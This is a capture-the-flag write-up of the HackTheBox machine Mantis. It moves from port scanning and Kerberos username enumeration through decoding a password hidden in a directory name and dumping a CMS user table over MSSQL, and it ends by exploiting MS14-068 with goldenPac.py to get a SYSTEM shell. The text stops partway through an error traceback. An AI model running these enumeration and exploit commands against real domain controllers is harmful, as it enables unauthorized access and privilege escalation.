HTB: Mantis

17 minute read

Summary

Mantis was a box that revolved around finding a webserver on an obscure port and finding a directory that had the password as the directory name, where you base64 decode the directory string of characters and get a bunch of hex. You then input this string of characters as hex and get an sql server passsword for the admin user. A lot of the struggle from this machine was the priv esc aspect which revolved around a kerberos vulnerability which I’m not too sure how you were meant to find this vulnerability as there are not really any scripts to detect this vulnerability. Its all just guessing that this is vulnerable to this exploit it seemed. But without further or do lets get into the writeup for Mantis from hackthebox.

Recon

┌─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $cat nmap/initial.txt 
# Nmap 7.91 scan initiated Mon Jul  5 16:46:35 2021 as: nmap -A -oN nmap/initial.txt 10.10.10.52
Nmap scan report for 10.10.10.52
Host is up (0.031s latency).
Not shown: 980 closed ports
PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-05 15:46:42Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
1433/tcp  open  ms-sql-s     Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: MANTIS
|   DNS_Domain_Name: htb.local
|   DNS_Computer_Name: mantis.htb.local
|_  Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-07-05T15:46:30
|_Not valid after:  2051-07-05T15:46:30
|_ssl-date: 2021-07-05T15:47:47+00:00; -3s from scanner time.
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
8080/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Tossed Salad - Blog
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc        Microsoft Windows RPC
49167/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 47m57s, deviation: 1h47m20s, median: -3s
| ms-sql-info: 
|   10.10.10.52:1433: 
|     Version: 
|       name: Microsoft SQL Server 2014 RTM
|       number: 12.00.2000.00
|       Product: Microsoft SQL Server 2014
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-os-discovery: 
|   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: mantis
|   NetBIOS computer name: MANTIS\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: mantis.htb.local
|_  System time: 2021-07-05T11:47:38-04:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-07-05T15:47:41
|_  start_date: 2021-07-05T15:44:59

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul  5 16:47:51 2021 -- 1 IP address (1 host up) scanned in 76.48 seconds

All port scan

┌─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $nmap -p- -oN nmap/all-ports --min-rate 10000 $ip 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-05 16:48 BST
Warning: 10.10.10.52 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.52
Host is up (0.043s latency).
Not shown: 65478 closed ports, 30 filtered ports
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1337/tcp  open  waste
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5722/tcp  open  msdfsr
8080/tcp  open  http-proxy
9389/tcp  open  adws
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49167/tcp open  unknown
49178/tcp open  unknown
49182/tcp open  unknown
50255/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 13.41 seconds

Enumerating services

DNS 53

I used htb.local as that is what the domain was showing as in the ldap script in nmap

┌─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $nslookup
> server 10.10.10.52
Default server: 10.10.10.52
Address: 10.10.10.52#53
> 10.10.10.52
** server can't find 52.10.10.10.in-addr.arpa: SERVFAIL
> 127.0.0.1
1.0.0.127.in-addr.arpa  name = localhost.
> htb.local
Server:         10.10.10.52
Address:        10.10.10.52#53

Name:   htb.local
Address: 10.10.10.52
Name:   htb.local
Address: dead:beef::7d1f:9883:34f2:4332
Name:   htb.local
Address: dead:beef::91fd:88ca:a39c:e5a5
> mantis.htb.local
Server:         10.10.10.52
Address:        10.10.10.52#53

Name:   mantis.htb.local
Address: 10.10.10.52
Name:   mantis.htb.local
Address: dead:beef::91fd:88ca:a39c:e5a5

RPC 135

Checking for null authentication was a dead end

┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $rpcclient -U '' $ip
Enter WORKGROUP\'s password: 
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE

LDAP 389

LDAP gave nothing useful as anonymous authentication was disabled

┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $ldapsearch -h $ip -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingContexts: DC=htb,DC=local
namingContexts: CN=Configuration,DC=htb,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=htb,DC=local
namingContexts: DC=DomainDnsZones,DC=htb,DC=local
namingContexts: DC=ForestDnsZones,DC=htb,DC=local

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1


┌─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $ldapsearch -h $ip -x -b "DC=htb,DC=local"
# extended LDIF
#
# LDAPv3
# base <DC=htb,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C09075A, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v1db1

# numResponses: 1

SMB 445

┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $smbmap -H $ip
[+] IP: 10.10.10.52:445 Name: 10.10.10.52                                       
┌─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $smbclient -L //10.10.10.52/
Enter WORKGROUP\purplerabbit's password: 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
SMB1 disabled -- no workgroup available

HTTP 8080

So I added mantis.htb.local to my /etc/hosts file and ran gobuster against the webserver

──╼ $/home/purplerabbit/Documents/gobuster-linux-amd64/gobuster dir -u http://$ip:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x -o gobuster-main.txt -t 50 
===============================================================                                                                                                                               
Gobuster v3.1.0                                                                                                                                                                               
by OJ Reeves (@TheColonial) & purplerabbittian Mehlmauer (@firefart)                                                                                                                                 
===============================================================                                                                                                                               
[+] Url:                     http://10.10.10.52:8080/                                                                                                                                         
[+] Method:                  GET                                                                                                                                                              
[+] Threads:                 50                                                                                                                                                               
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt                                                                                                     
[+] Negative Status codes:   404                                                                                                                                                              
[+] User Agent:              gobuster/3.1.0                                                                                                                                                   
[+] Extensions:              -o                                                                                                                                                               
[+] Timeout:                 10s                                                                                                                                                              
===============================================================                                                                                                                               
2021/07/05 17:47:21 Starting gobuster in directory enumeration mode                                                                                                                           
===============================================================                                                                                                                               
/archive              (Status: 200) [Size: 2866]                                                                                                                                              
/blogs                (Status: 200) [Size: 2913]                                                                                                                                              
/admin                (Status: 302) [Size: 163] [--> /Users/Account/AccessDenied?ReturnUrl=%2Fadmin] 
/tags                 (Status: 200) [Size: 2453]                                                    

Looking at the webserver it was running orchard cms. Looking for vulnerabilities for orchard cms showed the following

─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $searchsploit orchard 
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                              |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Orchard 1.3.9 - 'ReturnUrl' Open Redirection                                                                                                                | php/webapps/36493.txt
Orchard CMS 1.7.3/1.8.2/1.9.0 - Persistent Cross-Site Scripting                                                                                             | asp/webapps/37533.txt
Orchard Core RC1 - Persistent Cross-Site Scripting                                                                                                          | aspx/webapps/48456.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

I spent some time trying to post a comment thinking that it could be a cross site scripting vulnerability, but it wasn’t

Kerberos 88

So its possible to enumerate usernames of a domain using kerbrute

┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $~/Downloads/kerbrute_linux_amd64 userenum -d htb.local --dc $ip /opt/SecLists/Usernames/xato-net-10-million-usernames.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 07/06/21 - Ronnie Flathers @ropnop

2021/07/06 16:01:27 >  Using KDC(s):
2021/07/06 16:01:27 >   10.10.10.52:88

2021/07/06 16:01:27 >  [+] VALID USERNAME:       james@htb.local
2021/07/06 16:01:29 >  [+] VALID USERNAME:       James@htb.local
2021/07/06 16:01:38 >  [+] VALID USERNAME:       administrator@htb.local
2021/07/06 16:01:46 >  [+] VALID USERNAME:       mantis@htb.local
2021/07/06 16:02:05 >  [+] VALID USERNAME:       JAMES@htb.local
2021/07/06 16:02:51 >  [+] VALID USERNAME:       Administrator@htb.local
2021/07/06 16:03:30 >  [+] VALID USERNAME:       Mantis@htb.local

Looking to see if these users have do not require pre authentication enabled using the script from Impacket GetNPUsers.py proved useless

┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $GetNPUsers.py htb.local/ -usersfile users.txt -format hashcat -output hashes.asreproast -dc-ip 10.10.10.52
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[-] User james doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User mantis doesn't have UF_DONT_REQUIRE_PREAUTH set

Looking back at the ports, there was one unusual port 1337. Enumerating this port a little further using nmap showed that it was hosting a webserver

─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $nmap -A -p 1337 $ip
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-06 16:41 BST
Nmap scan report for mantis.htb (10.10.10.52)
Host is up (0.041s latency).

PORT     STATE SERVICE VERSION
1337/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.46 seconds

Going over to this webpage showed a simple IIS7 picture

I then ran gobuster on this webpage to see if we could find any interesting directories which found /secret_notes directory on this webserver. VIsiting this directory gave a listing of two other directories

Going over and looking at this dev_notes directory revealed text that reads:

1. Download OrchardCMS
2. Download SQL server 2014 Express ,create user "admin",and create orcharddb database
3. Launch IIS and add new website and point to Orchard CMS folder location.
4. Launch browser and navigate to http://localhost:8080
5. Set admin password and configure sQL server connection string.
6. Add blog pages with admin user.

However going at the bottom revealed credentials in binary form

Using an online binary to text service gave the output of @dm!n_P@ssW0rd! trying this password to access the orchard portal as admin worked!

Looking online to see if there was any way to upload a shell to orchard proved useless and looking for vulnerabilities for this version of orchard that was now showing in the admin portal 1.10.1.0

Mssql 1433

At the the bottom of the file it reads “SQL Server sa credentials file namez” Looking at the directory name I noticed it had a string of characters after dev_notes. I copied this string of characters and did a base64 decode on it and it gave me another string of characters.

─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $echo "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx" | base64 -d                      
6d2424716c5f53405f504073735730726421

At first I thought this was somekind of hash. But doing a wc -l on these characters revealed that it wasn’t a hash because a hash is typically 32 characters and this is 36

┌─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $echo -n "6d2424716c5f53405f504073735730726421" | wc -c
36

So this bit I was a little stuck on, but the string of characters here are actually just numbers and don’t have any letters higher than f - this gives an indication that it could be hex. So running xxd with the postscript continuous hexdump style and the revert flag to have it input the string of characters as hex and output just the ascii that it outputs gives the password for the sql sa account

┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $echo "6d2424716c5f53405f504073735730726421" | xxd -p -r
m$$ql_S@_P@ssW0rd!

Before this I tried to use “file” and “namez” as the password for the sa account but neither worked which made me think that it was the name of some file and guessed that it was the name of the directory I was in.

This next bit really did my head in because I was getting several errors using crackmapexec to attempt to execute code and impacket’s mssqlclient.py script

┌─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $crackmapexec mssql -d mantis.local -u sa -p "m$$ql_S@_P@ssW0rd!" -x "whoami" 10.10.10.52
                      
MSSQL       10.10.10.52     1433   None             [*] None (name:10.10.10.52) (domain:mantis.local)
MSSQL       10.10.10.52     1433   None             [-] ERROR(MANTIS\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Windows authentication.
┌─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $crackmapexec mssql -d mantis.htb -u sa -p "m$$ql_S@_P@ssW0rd!" -x "whoami" 10.10.10.52
                      
MSSQL       10.10.10.52     1433   None             [*] None (name:10.10.10.52) (domain:mantis.htb)
MSSQL       10.10.10.52     1433   None             [-] ERROR(MANTIS\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Windows authentication.
┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $mssqlclient.py  -windows-auth 'mantis/sa:m$$ql_S@_P@ssW0rd!'@10.10.10.52
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Encryption required, switching to TLS
[-] ERROR(MANTIS\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Windows authentication.
┌─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $mssqlclient.py  -windows-auth 'htb/sa:m$$ql_S@_P@ssW0rd!'@10.10.10.52
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Encryption required, switching to TLS
[-] ERROR(MANTIS\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Windows authentication.
┌─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $mssqlclient.py  -windows-auth 'htb.local/sa:m$$ql_S@_P@ssW0rd!'@10.10.10.52
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Encryption required, switching to TLS
[-] ERROR(MANTIS\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Windows authentication.

Removing -windws-auth fixes the issue with the untrusted domain, but now it was saying that the credentials were invalid

┌─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $mssqlclient.py  'htb.local/sa:m$$ql_S@_P@ssW0rd!'@10.10.10.52
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Encryption required, switching to TLS
[-] ERROR(MANTIS\SQLEXPRESS): Line 1: Login failed for user 'sa'.

After some time here I guessed that the sa user was incorrect and tried the admin as the user and got access to the sql service. However I didn’t have permissions to enable xp_cmdshelll which would have allowed me to execute code as the sql service user

┌─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $mssqlclient.py  'htb.local/admin:m$$ql_S@_P@ssW0rd!'@10.10.10.52
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 7208) 
[!] Press help for extra shell commands
SQL> help

     lcd {path}                 - changes the current local directory to {path}
     exit                       - terminates the server process (and this session)
     enable_xp_cmdshell         - you know what it means
     disable_xp_cmdshell        - you know what it means
     xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
     sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
     ! {cmd}                    - executes a local shell cmd
     
SQL> enable_xp_cmdshell
[-] ERROR(MANTIS\SQLEXPRESS): Line 105: User does not have permission to perform this action.
[-] ERROR(MANTIS\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
[-] ERROR(MANTIS\SQLEXPRESS): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
[-] ERROR(MANTIS\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
SQL> 

I then did a search of databases


SQL> SELECT name FROM master.sys.databases                                                                                                                                                    
name                                                                                                                                                                                 [230/597]
         
--------------------------------------------------------------------------------------------------------------------------------                                                                                                                                                                                                                                         
master                                                                                                                                                                               
tempdb                                                                                                                                                                                   
model                                                                                                                                                                                   
msdb                                                                                                                                                                                          
orcharddb 

Looking at the tables for the orcharddb gave a ton of output

SQL> SELECT                                                                                                                                                                                                                                   
  *                                                                                                                                                                                              
  orcharddb.INFORMATION_SCHEMA.TABLES;                                                                                                                                                                                                        
TABLE_CATALOG                                                                                                                      TABLE_SCHEMA                                                                                                                       TABLE_NAME                                                                                                                         TABLE_TYPE                                                                         
                                                         
--------------------------------------------------------------------------------------------------------------------------------   --------------------------------------------------------------------------------------------------------------------------------   --------------------------------------------------------------------------------------------------------------------------------   ----------                                                                         
       
orcharddb                                                                                                                          dbo                                                                                                                                blog_Orchard_Blogs_RecentBlogPostsPartRecord                                                                                       BASE TABLE                                                                         
        
orcharddb                                                                                                                          dbo                                                                                                                                blog_Orchard_Blogs_BlogArchivesPartRecord                                                                                          BASE TABLE                                                                         
                                                          
orcharddb                                                                                                                          dbo                                                                                                                                blog_Orchard_Workflows_TransitionRecord                                                                                            BASE TABLE                                                                         
                                                          
orcharddb                                                                                                                          dbo                                                                                                                                blog_Orchard_Workflows_WorkflowRecord                                                                                              BASE TABLE                                                                         
                                                                                                                                                                                                                                              
orcharddb                                                                                                                          dbo                                                                                                                                blog_Orchard_Workflows_WorkflowDefinitionRecord                                                                                    BASE TABLE                                                                         
                                                                                                                                                                                                                                              
orcharddb                                                                                                                          dbo                                                                                                                                blog_Orchard_Workflows_AwaitingActivityRecord                                                                                      BASE TABLE                                                                         
                                                                                                                                                                                                                                              
orcharddb                                                                                                                          dbo                                                                                                                                blog_Orchard_Workflows_ActivityRecord                                                                                              BASE TABLE                                                                         
                                                                                                                                                                                                                                              
orcharddb                                                                                                                          dbo                                                                                                                                blog_Orchard_Tags_TagsPartRecord                                                                                                   BASE TABLE                                                                         

---snipped---

Looking over the tables I saw one called blog_Orchard_Users_UserPartRecord doing a select on this table revealed Jame’s password

SQL> select * from blog_Orchard_Users_UserPartRecord;
         Id   UserName                                                                                                                                                                                                                                                          Email                                                                                                                                                                                                                                                             NormalizedUserName                                                                                                                                                                                                                                                Password                                                                                                                                                                                                                                                          PasswordFormat                                                                                                                                                                                                                                                    HashAlgorithm                                                                                                                                                                                                                                                     PasswordSalt                                                                                                                                                                                                                                                      RegistrationStatus                                                                                                                                                                                                                                                EmailStatus                                                                                                                                                                                                                                                       EmailChallengeToken                                                                                                                                                                                                                                               CreatedUtc            LastLoginUtc          LastLogoutUtc         

-----------   ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   -------------------   -------------------   -------------------   

          2   admin                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               admin                                                                                                                                                                                                                                                             AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A==                                                                                                                                                                                              Hashed                                                                                                                                                                                                                                                            PBKDF2                                                                                                                                                                                                                                                            UBwWF1CQCsaGc/P7jIR/kg==                                                                                                                                                                                                                                          Approved                                                                                                                                                                                                                                                          Approved                                                                                                                                                                                                                                                          NULL                                                                                                                                                                                                                                                              2017-09-01 13:44:01   2021-07-07 08:33:29   2017-09-01 14:06:31   

         15   James                                                                                                                                                                                                                                                             james@htb.local                                                                                                                                                                                                                                                   james                                                                                                                                                                                                                                                             J@m3s_P@ssW0rd!                                                                                                                                                                                                                                                   Plaintext                                                                                                                                                                                                                                                         Plaintext                                                                                                                                                                                                                                                         NA                                                                                                                                                                                                                                                                Approved                                                                                                                                                                                                                                                          Approved                                                                                                                                                                                                                                                          NULL                                                                                                                                                                                                                                                              2017-09-01 13:45:44   NULL                  NULL 

And we get Jame’s password J@m3s_P@ssW0rd!

We could have alternatively used dbeaver to browse through the sql server which can be installed using

sudo apt-get install dbeaver

and then run using

dbeaver

However when I tried doing this I got a TLS version error that I couldn’t seem to fix

Shell as James

First I tried to see if I could access winrm and was unsuccessful

┌─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $evil-winrm -u james -p J@m3s_P@ssW0rd! -i 10.10.10.52

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

Error: An error of type Errno::ECONNREFUSED happened, message is Connection refused - Connection refused - connect(2) for "10.10.10.52" port 5985 (10.10.10.52:5985)

Error: Exiting with code 1

┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $evil-winrm -u james -p J@m3s_P@ssW0rd! -i 10.10.10.52 -P 47001

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

Error: An error of type WinRM::WinRMHTTPTransportError happened, message is Unable to parse authorization header. Headers: {"Server"=>"Microsoft-HTTPAPI/2.0", "Date"=>"Wed, 07 Jul 2021 13:14:32 GMT", "Connection"=>"close", "Content-Length"=>"0"}
Body:  (404).

Error: Exiting with code 1

┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $evil-winrm -u james -p J@m3s_P@ssW0rd! -i 10.10.10.52 -P 47001 -S

Evil-WinRM shell v2.3

Warning: SSL enabled

Info: Establishing connection to remote endpoint

Error: An error of type Errno::ECONNREFUSED happened, message is Connection refused - Connection refused - connect(2) for "10.10.10.52" port 5986 (10.10.10.52:5986)

Error: Exiting with code 1

I then tried to see if there was write access to smb shares and there wasn’t

┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $smbmap -u james -p J@m3s_P@ssW0rd! -H $ip
[+] IP: 10.10.10.52:445 Name: mantis.htb                                        
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share 

WIth the password for the sa user I was able to execute

RPC

With this user I can now connect to rpc, but I couldn’t get any useful information here, but was able to see that there was just the james user and the administrator user on this box

┌─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $rpcclient -U james 10.10.10.52
Enter WORKGROUP\james's password: 
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[james] rid:[0x44f]

However there was an unintentional method for rooting this box which was simply using psexec as james user. However I believe that hackthebox have since patched this unintentional method as I couldn’t get this to work

┌─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $psexec.py htb.local/james@10.10.10.52 cmd.exe
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.10.52.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.

James => Administrator

Moving onto the intended method of rooting this machine which was a little bit far fetched in my opinion and is probably the reason that this machine is rated as hard and I’m not too sure how to add this in my methodology because its not really something I typically do because you are meant to see that this domain controller is vulnerable to MS14-068. There unfortunately are not any scripts to detect this exploit. But the script from impacket goldenPac.py automate the exploitation of this vulnerability and give you a system shell

┌─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $goldenPac.py -dc-ip 10.10.10.52 -target-ip 10.10.10.52 htb.local/james@mantis.htb.local
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller 10.10.10.52
[*] 10.10.10.52 found vulnerable!
[*] Requesting shares on 10.10.10.52.....
[*] Found writable share ADMIN$
[*] Uploading file nZdpZwjD.exe
[*] Opening SVCManager on 10.10.10.52.....
[*] Creating service mUmk on 10.10.10.52.....
[*] Starting service mUmk.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>

From the writeups that I did look at, none of them really gave a good explanation of how they detected that this machine was vulnerable to MS14-068. There was this writeup https://medium.com/secjuice/hackthebox-mantis-writeup-9c2b50c4b30b which said that he used the script from responder https://github.com/SpiderLabs/Responder/blob/master/tools/FindSMB2UPTime.py However when I tried to run this script on my system I couldn’t get the module packets installed and it just kept throwing me this error message

┌─[purplerabbit@kali]─[~/Documents/htb/ad/mantis]
└──╼ $python FindSMB2UPTime.py 
Traceback (most recent call last):
  File "FindSMB2UPTime.py", line 24, in <module>
    from packets import SMB2Header, SMB2Nego, SMB2NegoData
